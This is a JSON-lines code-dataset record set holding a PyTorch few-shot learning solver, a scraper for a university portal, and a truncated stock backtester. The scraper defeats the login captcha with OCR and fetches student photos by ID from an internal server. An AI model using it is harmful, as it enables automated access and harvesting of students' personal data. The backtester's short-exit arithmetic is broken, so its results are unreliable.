os.makedirs(self.ckp_dir, exist_ok=True)\n self.log_interval = config.log_interval\n self.ckp_interval = config.ckp_interval\n\n self.use_wandb = config.use_wandb\n \n self.build_model()\n\n def build_model(self):\n self.cnn = Convnet().to(self.device)\n self.g = Hallucinator(self.nz).to(self.device)\n self.mlp = MLP().to(self.device)\n self.d = Discriminator().to(self.device)\n\n self.optimizer = torch.optim.AdamW(list(self.cnn.parameters()) + list(self.g.parameters()) + list(self.mlp.parameters()), lr=self.lr, betas=[self.beta1, self.beta2], weight_decay=self.weight_decay)\n self.optimizer_d = torch.optim.AdamW(self.d.parameters(), lr=self.lr, betas=[self.beta1, self.beta2], weight_decay=self.weight_decay)\n\n if self.matching_fn == 'parametric':\n self.parametric = nn.Sequential(\n nn.Linear(800, 400),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(400, 1)\n ).to(self.device)\n self.optimizer = torch.optim.AdamW(list(self.cnn.parameters()) + list(self.g.parameters()) + list(self.mlp.parameters()) + list(self.parametric.parameters()), lr=self.lr, betas=[self.beta1, self.beta2], weight_decay=self.weight_decay)\n\n self.scheduler = StepLR(self.optimizer, step_size=self.num_steps_decay, gamma=0.9)\n self.scheduler_d = StepLR(self.optimizer_d, step_size=self.num_steps_decay, gamma=0.9)\n\n def save_checkpoint(self, step):\n state = {'cnn': self.cnn.state_dict(),\n 'g': self.g.state_dict(),\n 'mlp': self.mlp.state_dict(),\n 'optimizer' : self.optimizer.state_dict(),\n 'd': self.d.state_dict(),\n 'optimizer_d' : self.optimizer_d.state_dict()}\n\n if self.matching_fn == 'parametric':\n state['parametric'] = self.parametric.state_dict()\n\n new_checkpoint_path = os.path.join(self.ckp_dir, '{}-improved_dhm.pth'.format(step + 1))\n torch.save(state, new_checkpoint_path)\n print('model saved to %s' % new_checkpoint_path)\n\n def load_checkpoint(self, resume_iter):\n print('Loading the trained models from step {}...'.format(resume_iter))\n new_checkpoint_path = os.path.join(self.ckp_dir, '{}-improved_dhm.pth'.format(resume_iter))\n state = torch.load(new_checkpoint_path)\n self.cnn.load_state_dict(state['cnn'])\n self.g.load_state_dict(state['g'])\n self.mlp.load_state_dict(state['mlp'])\n self.optimizer.load_state_dict(state['optimizer'])\n self.d.load_state_dict(state['d'])\n self.optimizer_d.load_state_dict(state['optimizer_d'])\n if self.matching_fn == 'parametric':\n self.parametric.load_state_dict(state['parametric'])\n print('model loaded from %s' % new_checkpoint_path)\n \n def train(self):\n task_criterion = nn.CrossEntropyLoss()\n adversarial_criterion = nn.BCELoss()\n\n best_mean = 0\n iteration = 0\n real_label = 1.\n fake_label = 0.\n\n self.sample_idx_val = []\n self.noise_val = []\n for i in range(self.episodes_per_epoch):\n self.sample_idx_val.append(torch.tensor([torch.randint(self.N_shot_val * i, self.N_shot_val * (i + 1), (self.M_aug_val,)).numpy() for i in range(self.N_way_val)]).reshape(-1))\n self.noise_val.append(torch.randn((self.N_way_val * self.M_aug_val, self.nz), device=self.device))\n\n if self.resume_iter:\n print(\"resuming step %d ...\"% self.resume_iter)\n iteration = self.resume_iter\n self.load_checkpoint(self.resume_iter)\n loss, mean, std = self.eval()\n if mean > best_mean:\n best_mean = mean\n\n episodic_acc = []\n\n for ep in range(self.num_epochs):\n self.cnn.train()\n self.g.train()\n self.mlp.train()\n self.d.train()\n for batch_idx, (data, target) in enumerate(self.train_loader):\n data = data.to(self.device)\n \n support_input = data[:self.N_way_train * self.N_shot_train,:,:,:] \n query_input = data[self.N_way_train * self.N_shot_train:,:,:,:]\n\n label_encoder = {target[i * self.N_shot_train] : i for i in range(self.N_way_train)}\n query_label = torch.cuda.LongTensor([label_encoder[class_name] for class_name in target[self.N_way_train * self.N_shot_train:]])\n\n real_label = torch.full((self.N_way_train * self.N_shot_val,), 1., dtype=torch.float, device=self.device)\n real_label_g = torch.full((self.N_way_train * self.M_aug_train,), 1., dtype=torch.float, device=self.device)\n fake_label_g = torch.full((self.N_way_train * self.M_aug_train,), 0., dtype=torch.float, device=self.device)\n\n ################\n # update D #\n ################\n support = self.cnn(support_input)\n queries = self.cnn(query_input)\n\n sample_idx = torch.tensor([torch.randint(self.N_shot_train * i, self.N_shot_train * (i + 1), (self.M_aug_train,)).numpy() for i in range(self.N_way_train)]).reshape(-1)\n noise = torch.randn((self.N_way_train * self.M_aug_train, self.nz), device=self.device)\n\n sample = support[sample_idx]\n support_g = self.g(sample, noise)\n\n if ep >= self.active_adversarial_loss_step:\n for _ in range(self.num_d_steps):\n self.optimizer_d.zero_grad()\n self.optimizer.zero_grad()\n\n d_loss_adv_fake = adversarial_criterion(self.d(support_g.detach()).view(-1), fake_label_g)\n d_loss_adv_real = adversarial_criterion(self.d(support.detach()).view(-1), real_label)\n\n d_loss = self.alpha_weight * (d_loss_adv_fake + d_loss_adv_real)\n d_loss.backward()\n self.optimizer_d.step()\n\n else:\n d_loss_adv_fake = torch.tensor(0).cuda()\n d_loss_adv_real = torch.tensor(0).cuda()\n d_loss = torch.tensor(0).cuda()\n d_loss_task = torch.tensor(0).cuda()\n\n ################\n # update H #\n ################\n self.optimizer_d.zero_grad()\n self.optimizer.zero_grad()\n\n if ep >= self.active_adversarial_loss_step:\n h_loss_adv = adversarial_criterion(self.d(support_g).view(-1), real_label_g)\n else:\n h_loss_adv = torch.tensor(0).cuda()\n\n support_g_r = support_g.reshape(self.N_way_train, self.M_aug_train, -1)\n support_r = support.reshape(self.N_way_train, self.N_shot_train, -1)\n\n support_aug = torch.cat([support_r, support_g_r], dim=1)\n support_aug = support_aug.reshape(self.N_way_train * (self.N_shot_train + self.M_aug_train), -1)\n\n prototypes = self.mlp(support_aug)\n prototypes = prototypes.reshape(self.N_way_train, self.N_shot_train + self.M_aug_train, -1).mean(dim=1)\n queries = self.mlp(queries)\n\n if self.matching_fn == 'parametric':\n distances = pairwise_distances(queries, prototypes, self.matching_fn, self.parametric)\n\n else:\n distances = pairwise_distances(queries, prototypes, self.matching_fn)\n\n h_loss_task = task_criterion(-distances, query_label)\n h_loss = self.alpha_weight * h_loss_adv + h_loss_task\n h_loss.backward()\n self.optimizer.step()\n\n y_pred = (-distances).softmax(dim=1).max(1, keepdim=True)[1]\n episodic_acc.append(1. * y_pred.eq(query_label.view_as(y_pred)).sum().item() / len(query_label))\n\n if (iteration + 1) % self.log_interval == 0:\n episodic_acc = np.array(episodic_acc)\n mean = episodic_acc.mean()\n std = episodic_acc.std()\n episodic_acc = []\n\n print('Epoch: {:3d} [{:d}/{:d}] Iteration: {:5d} h_loss: {:.4f} h_loss_adv: {:.4f} h_loss_task: {:.4f} d_loss: {:.4f} d_loss_adv_fake: {:.4f} d_loss_adv_real: {:.4f} Accuracy: {:.2f} +- {:.2f} %'.format(\n ep, (batch_idx + 1), len(self.train_loader), iteration + 1, \n h_loss.item(), h_loss_adv.item(), h_loss_task.item(), \n d_loss.item(), d_loss_adv_fake.item(), d_loss_adv_real.item(),\n mean * 100, 1.96 * std / (self.log_interval)**(1/2) * 100))\n\n if self.use_wandb:\n import wandb\n wandb.log({\n 'h_loss': h_loss.item(),\n 'h_loss_adv': h_loss_adv.item(),\n 'h_loss_task': h_loss_task.item(),\n 'd_loss': d_loss.item(),\n 'd_loss_adv_fake': d_loss_adv_fake.item(),\n 'd_loss_adv_real': d_loss_adv_real.item(),\n \"acc_mean\": mean * 100,\n \"acc_ci\": 1.96 * std / (self.log_interval)**(1/2) * 100,\n 'lr': self.optimizer.param_groups[0]['lr']\n }, step=iteration+1)\n\n\n\n if (iteration + 1) % self.ckp_interval == 0:\n loss, mean, std = self.eval()\n if mean > best_mean:\n best_mean = mean\n self.save_checkpoint(iteration)\n if self.use_wandb:\n wandb.run.summary[\"best_accuracy\"] = best_mean * 100\n\n if self.use_wandb:\n import wandb\n wandb.log({\"val_loss\": loss,\n \"val_acc_mean\": mean * 100,\n \"val_acc_ci\": 1.96 * std / (600)**(1/2) * 100}, \n step=iteration+1, commit=False)\n\n iteration += 1\n\n self.scheduler.step()\n self.scheduler_d.step()\n\n def eval(self):\n criterion = nn.CrossEntropyLoss()\n self.cnn.eval()\n self.g.eval()\n self.mlp.eval()\n self.d.eval()\n episodic_acc = []\n loss = []\n \n with torch.no_grad():\n for b_idx, (data, target) in enumerate(self.val_loader):\n data = data.to(self.device)\n support_input = data[:self.N_way_val * self.N_shot_val,:,:,:] \n query_input = data[self.N_way_val * self.N_shot_val:,:,:,:]\n\n label_encoder = {target[i * self.N_shot_val] : i for i in range(self.N_way_val)}\n query_label = torch.cuda.LongTensor([label_encoder[class_name] for class_name in target[self.N_way_val * self.N_shot_val:]])\n\n support = self.cnn(support_input)\n queries = self.cnn(query_input)\n\n sample_idx = self.sample_idx_val[b_idx]\n sample = support[sample_idx]\n \n noise = self.noise_val[b_idx]\n\n support_g = self.g(sample, noise).reshape(self.N_way_val, self.M_aug_val, -1)\n support = support.reshape(self.N_way_val, self.N_shot_val, -1)\n\n support_aug = torch.cat([support, support_g], dim=1)\n support_aug = support_aug.reshape(self.N_way_val * (self.N_shot_val + self.M_aug_val), -1)\n\n prototypes = self.mlp(support_aug)\n prototypes = prototypes.reshape(self.N_way_val, self.N_shot_val + self.M_aug_val, -1).mean(dim=1)\n queries = self.mlp(queries)\n\n if self.matching_fn == 'parametric':\n distances = pairwise_distances(queries, prototypes, self.matching_fn, self.parametric)\n else:\n distances = pairwise_distances(queries, prototypes, self.matching_fn)\n \n loss.append(criterion(-distances, query_label).item())\n y_pred = (-distances).softmax(dim=1).max(1, keepdim=True)[1]\n episodic_acc.append(1. * y_pred.eq(query_label.view_as(y_pred)).sum().item() / len(query_label))\n\n loss = np.array(loss)\n episodic_acc = np.array(episodic_acc)\n loss = loss.mean()\n mean = episodic_acc.mean()\n std = episodic_acc.std()\n\n print('\\nLoss: {:.6f} Accuracy: {:.2f} +- {:.2f} %\\n'.format(loss,mean * 100, 1.96 * std / (600)**(1/2) * 100))\n\n return loss, mean, std\n", "sub_path": "hw4/improved_data_hallucination/solver.py", "file_name": "solver.py", "file_ext": "py", "file_size_in_byte": 14587, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.cuda.is_available", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 16, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 44, "usage_type": "call"}, {"api_name": "model.Convnet", "line_number": 53, "usage_type": "call"}, {"api_name": "model.Hallucinator", "line_number": 54, "usage_type": "call"}, {"api_name": "model.MLP", "line_number": 55, "usage_type": "call"}, {"api_name": "model.Discriminator", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.optim.AdamW", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 58, "usage_type": "attribute"}, {"api_name": "torch.optim.AdamW", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 59, "usage_type": "attribute"}, {"api_name": "torch.nn.Sequential", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.optim.AdamW", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 68, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.BCELoss", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.randint", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.cuda.LongTensor", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 139, "usage_type": "attribute"}, {"api_name": "torch.full", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 141, "usage_type": "attribute"}, {"api_name": "torch.full", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 142, "usage_type": "attribute"}, {"api_name": "torch.full", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 143, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.randint", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 170, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 189, "usage_type": "call"}, {"api_name": "utils.pairwise_distances", "line_number": 197, "usage_type": "call"}, {"api_name": "utils.pairwise_distances", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 211, "usage_type": "call"}, {"api_name": "wandb.log", "line_number": 224, "usage_type": "call"}, {"api_name": "wandb.run", "line_number": 244, "usage_type": "attribute"}, {"api_name": "wandb.log", "line_number": 248, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 259, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 259, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 267, "usage_type": "call"}, {"api_name": "torch.cuda.LongTensor", "line_number": 274, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 274, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 287, "usage_type": "call"}, {"api_name": "utils.pairwise_distances", "line_number": 295, "usage_type": "call"}, {"api_name": "utils.pairwise_distances", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 303, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 304, "usage_type": "call"}]} +{"seq_id": "535976039", "text": "import requests\r\nimport re\r\nfrom PIL import Image\r\nfrom bs4 import BeautifulSoup\r\nimport pytesseract\r\nfrom lxml import etree\r\nsession=requests.session()\r\nCookies={}\r\nheaders={\r\n 'Host':'rz.wzu.edu.cn',\r\n 'Origin':'http://rz.wzu.edu.cn',\r\n 'Referer':'http://rz.wzu.edu.cn/zfca/login',\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36'\r\n}\r\n\r\ndef get_photonumble():#获取验证码,由于是session,所以完全可以使用这个,不用担心验证码和其他的不准确性。\r\n code = session.get('http://rz.wzu.edu.cn/zfca/captcha.htm')\r\n with open(\"D://1.jpg\", 'wb') as f:\r\n f.write(code.content)\r\n f.close()\r\n im = Image.open(\"D://1.jpg\")\r\n text = pytesseract.image_to_string(im)\r\n return text\r\n\r\ndef login(numble,user,pwd):#用户登录\r\n global cookiejars\r\n postdata = {\r\n \"username\": user,\r\n \"password\": pwd,\r\n \"useValidateCode\": \"1\",\r\n \"isremenberme\": \"1\",\r\n \"ip\": \" \",\r\n 'lt': '',\r\n '_eventId': 'submit',\r\n 'losetime': '30',\r\n 'j_captcha_response': numble,\r\n 'rememberMe': 'true'\r\n }\r\n login_page=session.get('http://rz.wzu.edu.cn/zfca/login',headers=headers)\r\n soup=BeautifulSoup(login_page.text,'lxml')\r\n soup=soup.find(attrs={'name':'lt'})\r\n postdata['lt']=soup['value']\r\n session.post('http://rz.wzu.edu.cn/zfca/login',data=postdata,headers=headers)\r\n\r\n session.get('http://rz.wzu.edu.cn/zfca/login?yhlx=student&login=0122579031373493708&url=xs_main.aspx')#获取session_id\r\n\r\n for key,value in dict(session.cookies.get_dict()).items():\r\n Cookies[key] = value\r\n page=session.get('http://portal.wzu.edu.cn/portal.do?caUserName=17211134120').text\r\n\r\n\r\n page=BeautifulSoup(page,'html.parser')\r\n try:\r\n ans = page.find('title').string\r\n name = page.find('em').string.split(': ')[-1]\r\n\r\n return [ans,name]\r\n except:\r\n return ['none','none']\r\ndef getmessage(user,name):#获取个人信息里面的东西\r\n headers['Referer'] = 'http://jwc3.wzu.edu.cn/xs_main.aspx?xh=%s&type=1' % (user)\r\n headers['Host'] = 'jwc3.wzu.edu.cn'\r\n headers['Upgrade-Insecure-Requests'] = '1'\r\n headers['Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8'\r\n url = 'http://jwc3.wzu.edu.cn/xsgrxx.aspx?xh=%s&xm=%s&gnmkdm=N121501' % (user, name)\r\n page = session.get(url, headers=headers, cookies=Cookies)#这里是获取个人信息,由于不知道要什么信息,所以先以message的信息存储。\r\n page=BeautifulSoup(page.text,'html.parser')\r\ndef get_userphoto(user):#获取user对应的图片\r\n\r\n r = session.get('http://192.168.10.3/xgxt/xsxx_xsgl.do?method=showPhoto&xh=%s' % (user))\r\n if len(r.content) > 10000:\r\n root = 'E://pt/%s.jpeg' % (user)\r\n with open(root, 'wb+') as f:\r\n f.write(r.content)\r\n f.close()\r\n im = Image.open(root)#弹出图片\r\n im.show()\r\ndef process():\r\n user=input(\"学号:\")\r\n pwd=input(\"密码:\")\r\n\r\n for i in range(3):#进行三次登录,如果不行就说明失败\r\n numble = get_photonumble()\r\n anss = login(numble, user, pwd)\r\n ans = anss[0]\r\n name = anss[1]\r\n if re.findall(\"个人门户\", ans):\r\n print(\"登录成功\")\r\n getmessage(user, name)\r\n break\r\n else:\r\n print(\"failed\")\r\n\r\nif __name__ == '__main__':\r\n process()", "sub_path": "Spider/demo.py", "file_name": "demo.py", "file_ext": "py", "file_size_in_byte": 3550, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.session", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 21, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 21, "usage_type": "name"}, {"api_name": "pytesseract.image_to_string", "line_number": 22, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 40, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 52, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 67, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 76, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 76, "usage_type": "name"}, {"api_name": "re.findall", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "369785301", "text": "\"\"\"\r\n\r\nThe Main class for backtesting.\r\nSome variables have defaults but can be overwritten\r\n\r\nUse vantage_pull to update data daily\r\n\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nclass Mint_Cash():\r\n \r\n def __init__(self, daf, \r\n short_ma_x, \r\n std = 1.2,\r\n hskl = 80,\r\n lskl = 20,\r\n sd = 3,\r\n sl = 7,\r\n print_port=False,\r\n print_plot=False):\r\n\r\n self.df = daf\r\n self.df.index = pd.to_datetime(self.df.index)\r\n self.df.sort_index(inplace=True)\r\n self.hskl = hskl\r\n self.lskl = lskl\r\n \r\n###Moving Averages\r\n self.df.loc[:, \"short_ma\"] = self.df.loc[:, \"close\"].rolling(5, center=False).mean()\r\n self.df.loc[:, \"ewma\"] = self.df.loc[:, \"close\"].ewm(span=short_ma_x).mean()\r\n self.df.loc[:, \"bb_upper\"] = self.df.loc[:, \"ewma\"] + self.df.loc[:,\"close\"].rolling(short_ma_x, center=False).std()*std\r\n self.df.loc[:, \"bb_lower\"] = self.df.loc[:, \"ewma\"] - self.df.loc[:,\"close\"].rolling(short_ma_x, center=False).std()*std \r\n self.df.loc[:, 'timestamp'] = self.df.index\r\n\r\n\r\n###Mathematical Derivatives\r\n self.df.loc[:, \"first_diff\"] = self.df.loc[:, \"ewma\"].rolling(10, center=False).mean().diff()\r\n self.df.loc[:, \"second_diff\"] = self.df.loc[:, \"ewma\"].rolling(10, center=False).mean().diff().diff()\r\n self.df.loc[:, \"third_diff\"] = self.df.loc[:, \"ewma\"].rolling(10, center=False).mean().diff().diff().diff()\r\n self.df.loc[:, \"fd_high\"] = abs(self.df.loc[:, \"first_diff\"] + self.df.loc[:, \"first_diff\"].rolling(short_ma_x, center=False).std()*std)\r\n self.df.loc[:, \"fd_low\"] = 0 - abs(abs(self.df.loc[:, \"first_diff\"]) + self.df.loc[:, \"first_diff\"].rolling(short_ma_x, center=False).std()*std)\r\n self.df.reset_index(drop=True, inplace=True)\r\n\r\n###Stochastic Oscillator \r\n self.df.loc[:, \"stoch_high\"] = self.df.loc[:, \"close\"].rolling(short_ma_x, center=False).max()\r\n self.df.loc[:, \"stoch_low\"] = self.df.loc[:, \"close\"].rolling(short_ma_x, center=False).min()\r\n self.df.loc[:, \"stoch_k\"] = 100 * (self.df.loc[:, \"close\"] - self.df.loc[:, \"stoch_low\"])/(self.df.loc[:, \"stoch_high\"] - self.df.loc[:, \"stoch_low\"])\r\n self.df.loc[:, \"stoch_d\"] = self.df.loc[:, \"stoch_k\"].rolling(sd, center=False).mean()\r\n self.df.loc[:, \"stoch_l\"] = self.df.loc[:, \"stoch_k\"].rolling(sl, center=False).mean()\r\n \r\n###Misc Settings\r\n self.print_port = print_port\r\n self.print_plot = print_plot\r\n \r\n def trader(self):\r\n self.initial_capital = 10000\r\n self.leverage = 1\r\n \r\n self.position = False\r\n \r\n #Build portfolio\r\n portfolio = pd.DataFrame(index=self.df.index)\r\n portfolio['cash'] = 0\r\n portfolio.loc[0, 'cash'] = self.initial_capital #['cash'][0] = initial_capital\r\n portfolio.loc[0, 'holdings'] = 0\r\n portfolio['close'] = self.df['close']\r\n portfolio['signal'] = 0\r\n \r\n def print_status(i):\r\n print(\"\\n\", i, \"ewma, close, upper, lower\",\r\n self.df.loc[i, 'ewma'],\r\n self.df.loc[i, 'close'],\r\n self.df.loc[i, 'bb_upper'],\r\n self.df.loc[i, 'bb_lower'])\r\n \r\n #Define trading actions \r\n def same(i):\r\n portfolio.loc[i, \"AAPL\"] = portfolio.loc[i-1, \"AAPL\"]\r\n portfolio.loc[i, 'cash'] = portfolio.loc[i-1, 'cash']\r\n portfolio.loc[i, 'holdings'] = portfolio.loc[i-1, 'AAPL'] * self.df.loc[i-1, 'close']\r\n portfolio.loc[i, 'signal'] = 0\r\n \r\n def enter_long(i):\r\n portfolio.loc[i,\"AAPL\"] = portfolio.loc[i, 'cash']/self.df.loc[i, 'close']\r\n portfolio.loc[i,'cash'] = 0\r\n portfolio.loc[i, 'holdings'] = portfolio.loc[i, \"AAPL\"] * self.df.loc[i, 'close']\r\n portfolio.loc[i, 'signal'] = 1\r\n self.position = 'long'\r\n \r\n def exit_long(i):\r\n portfolio.loc[i, 'cash'] = portfolio.loc[i, 'AAPL'] * self.df.loc[i, 'close']\r\n portfolio.loc[i, \"AAPL\"] = 0\r\n portfolio.loc[i, 'holdings'] = 0\r\n self.position = False\r\n portfolio.loc[i, 'signal'] = 2\r\n \r\n def enter_short(i):\r\n portfolio.loc[i, 'cash'] = portfolio.loc[i, 'cash']\r\n portfolio.loc[i, 'AAPL'] = (portfolio.loc[i, 'cash']/self.df.loc[i, 'close'])*-1\r\n portfolio.loc[i, 'holdings'] = (portfolio.loc[i, 'AAPL']*self.df.loc[i, 'close'])\r\n self.position = 'short'\r\n self.short_enter_price = self.df.loc[i, 'close']\r\n portfolio.loc[i, 'signal'] = -1\r\n \r\n def exit_short(i):\r\n portfolio.loc[i, 'AAPL'] = 0\r\n portfolio.loc[i, 'cash'] = (portfolio.loc[i, 'AAPL']*(self.short_enter_price - self.df.loc[i, 'close'])*-1) + portfolio.loc[i, 'cash']\r\n portfolio.loc[i, 'holdings'] = 0\r\n self.position = False\r\n portfolio.loc[i, 'signal'] = -2\r\n \r\n for i, index in enumerate(self.df.index):\r\n \r\n #set troubleshooting range\r\n if i > 50 and i < 0:\r\n self.b_s = True\r\n print_status(i) \r\n else: \r\n self.b_s = False\r\n \r\n #If we are on the last row of the dataframe, exit all positions\r\n if i == len(self.df.index)-1:\r\n same(i)\r\n if self.position == 'short':\r\n exit_short(i)\r\n if self.position == 'long':\r\n exit_long(i)\r\n \r\n elif i >= 3:\r\n #Update all variables\r\n #Initialize variables to reduce typing\r\n ewma = self.df.loc[i-1, 'ewma']\r\n close = self.df.loc[i-1, 'close']\r\n bb_upper = self.df.loc[i-1, 'bb_upper']\r\n bb_lower = self.df.loc[i-1, 'bb_lower']\r\n fd = self.df.loc[i-1, \"first_diff\"]\r\n sd = self.df.loc[i-1, \"second_diff\"]\r\n td = self.df.loc[i-1, \"third_diff\"]\r\n fd_high = self.df.loc[i-1, \"fd_high\"]\r\n fd_low = self.df.loc[i-1, \"fd_low\"]\r\n# sd_high = self.df.loc[i-1, \"sd_high\"]\r\n# sd_low = self.df.loc[i-1, \"sd_low\"]\r\n stoch_d = self.df.loc[i-1, \"stoch_d\"]\r\n hskl = self.hskl\r\n lskl = self.lskl\r\n \r\n same(i)\r\n \r\n ###GOING LONG###\r\n if(\r\n (lskl < stoch_d < hskl) and #If stock is stable\r\n (\r\n (sd > 0) or #Stock is gaining upward\r\n (close < bb_lower) #Momentum but closed low\r\n ) or \r\n (\r\n stoch_d > hskl and #Stock is trending up\r\n close < ewma #and closed lower than average\r\n )\r\n \r\n ):\r\n \r\n if self.position == 'long':\r\n same(i)\r\n \r\n if self.position == 'short':\r\n exit_short(i)\r\n enter_long(i)\r\n \r\n if not self.position:\r\n enter_long(i)\r\n \r\n ###SHORTING###\r\n elif(\r\n (lskl < stoch_d < hskl) and \r\n (\r\n (sd < 0) or\r\n (close > bb_upper)\r\n ) or \r\n (\r\n stoch_d < lskl and\r\n close > ewma\r\n ) \r\n ):\r\n \r\n if self.position == 'short':\r\n same(i)\r\n\r\n if self.position == 'long':\r\n exit_long(i)\r\n enter_short(i)\r\n \r\n if not self.position:\r\n enter_short(i)\r\n\r\n else:\r\n same(i)\r\n \r\n #To avoid Index Errors with the i-1 references in the loop we stay\r\n #the same for the first 3 iterations\r\n elif i < 3:\r\n portfolio.loc[i, \"AAPL\"] = 0\r\n portfolio.loc[i, 'cash'] = self.initial_capital\r\n portfolio.loc[i, 'holdings'] = 0\r\n \r\n else:\r\n print(\"\\nfailed with:\")\r\n break\r\n if i > i: print(\"Missed at:\", i)\r\n\r\n portfolio.loc[i, 'total'] = portfolio.loc[i, 'cash'] + portfolio.loc[i, 'holdings']\r\n ###END FOR LOOP###\r\n \r\n if self.print_port:\r\n with pd.option_context('display.max_rows', None, 'display.max_columns', 3):\r\n print(portfolio)\r\n \r\n #Visualize Portfolio Value\r\n fig = plt.figure()\r\n \r\n ax1 = fig.add_subplot(111, ylabel='Portfolio value in $')\r\n \r\n portfolio['total'].plot(ax=ax1, lw=.2, figsize=(12,8))\r\n# plt.xlim(20, 60)\r\n # Show the plot\r\n plt.show()\r\n \r\n# print(\"Weekly Goals: \", self.weekly_goals_met, \"\\nMonthly Goals:\", self.monthly_goals_met)\r\n portfolio.to_csv('C:/python/20cash17/portfolio.csv')\r\n \r\n if self.print_plot:\r\n start_win = 40\r\n end_win = 100\r\n \r\n fig = plt.figure(figsize=(12,12))\r\n### AX 1\r\n ax1 = fig.add_subplot(311)\r\n \r\n ax1.plot(self.df.loc[:, \"short_ma\"], linestyle='--', linewidth=1)\r\n ax1.plot(self.df.loc[:, \"ewma\"], linestyle='--', linewidth=4)\r\n# ax1.plot(self.df.loc[:, \"l_ewma\"], linestyle=':', linewidth=4)\r\n ax1.plot(self.df.loc[:, \"close\"], linewidth=4)\r\n ax1.plot(self.df.loc[:, \"bb_upper\"], color='r', linestyle=':', linewidth=.4)\r\n ax1.plot(self.df.loc[:, \"bb_lower\"], color='r', linestyle=':', linewidth=.4) \r\n \r\n #Enter Long\r\n ax1.plot(portfolio.loc[portfolio.loc[:, 'signal'] == 1.0].index, \r\n self.df.close[portfolio.loc[:, 'signal'] == 1.0],\r\n '^', markersize = 10.0, color='m')\r\n \r\n #Enter Short\r\n ax1.plot(portfolio.loc[portfolio.loc[:, 'signal'] == -1.0].index, \r\n self.df.close[portfolio.loc[:, 'signal'] == -1.0],\r\n 'v', markersize = 10.0, color='m')\r\n #Exit Long\r\n ax1.plot(portfolio.loc[portfolio.loc[:, 'signal'] == 2.0].index, \r\n self.df.close[portfolio.loc[:, 'signal'] == 2.0],\r\n '^', markersize = 10.0, 